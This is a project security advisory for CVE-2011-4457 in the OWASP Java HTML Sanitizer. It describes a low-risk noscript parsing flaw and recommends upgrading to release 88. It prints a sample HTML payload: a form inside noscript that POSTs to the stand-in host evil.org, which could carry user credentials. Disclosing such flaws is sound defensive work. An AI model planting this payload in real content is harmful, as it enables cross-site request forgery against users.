#summary CVE-2011-4457
#labels Security

=CVE-2011-4457=

A vulnerability in the [http://code.google.com/p/owasp-java-html-sanitizer/ OWASP HTML Sanitizer]
allows redirecting or POSTing to an arbitrary URL when the user
interacts with sanitized content and when JavaScript is disabled.

It also allows inclusion of links without [`rel=nofollow`](http://microformats.org/wiki/rel-nofollow) when JavaScript is disabled.
Crawlers that respect `nofollow` and which look for links inside `<noscript>...</noscript>` could conclude a containing page has link-spam.

Due to the constrained circumstances and the fact that it does not
allow exfiltration of data protected by the same-origin policy it is
considered low risk.  For policies that allow external links, the
escalation of privilege only includes POSTing, possibly including
upload of files chosen by the user.

We recommend upgrading to [http://code.google.com/p/owasp-java-html-sanitizer/source/detail?r=88 release 88] or later available via
[http://code.google.com/p/owasp-java-html-sanitizer/downloads/list downloads]
which does not break API compatibility with the previous release.

The project CHANGE log is available at
http://owasp-java-html-sanitizer.googlecode.com/svn/trunk/CHANGE_LOG.html

== Details ==

The attack hinges on the way `<noscript>` was parsed and rendered.

{{{
<noscript>
  <form method=POST action=http://evil.org/>
    <input name=x value=y>
    <input type=submit>
  </form>
</noscript>
}}}

will POST `x=y` to `http://evil.org/` when the submit button is pressed
and when the user has javascript turned off as when running the NoScript extension.

The POST will carry user credentials so a vulnerable page can be used to initiate XSRF against vulnerable servers.